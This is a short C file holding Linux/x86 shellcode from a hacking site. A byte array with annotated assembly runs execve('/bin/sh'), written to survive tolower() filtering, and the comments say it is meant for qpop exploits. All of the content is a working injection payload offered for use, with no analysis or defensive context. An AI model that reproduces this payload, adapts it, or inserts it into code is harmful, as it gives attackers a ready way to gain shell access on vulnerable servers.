/* * Linux/x86 * tolower() evasion, execve() /bin/sh * (eg use: various qpop exploits) * * by anathema */ char c0de[] = /* anathema */ /* main: */ "\xeb\x1b" /* jmp callz */ /* start: */ "\x5e" /* popl %esi */ "\x89\xf3" /* movl %esi, %ebx */ "\x89\xf7" /* movl %esi, %edi */ "\x83\xc7\x07" /* addl $0x07, %edi */ "\x29\xc0" /* subl %eax, %eax */ "\xaa" /* stosb %al, %es:(%edi) */ "\x89\xf9" /* movl %edi, %ecx */ "\x89\xf0" /* movl %esi, %eax */ "\xab" /* stosl %eax, %es:(%edi) */ "\x89\xfa" /* movl %edi, %edx */ "\x29\xc0" /* subl %eax, %eax */ "\xab" /* stosl %eax, %es:(%edi) */ "\xb0\x08" /* movb $0x08, %al */ "\x04\x03" /* addb $0x03, %al */ "\xcd\x80" /* int $0x80 */ /* callz: */ "\xe8\xe0\xff\xff\xff" /* call start */ /* DATA */ "/bin/sh"; /* www.hack.co.za [8 August 2000]*/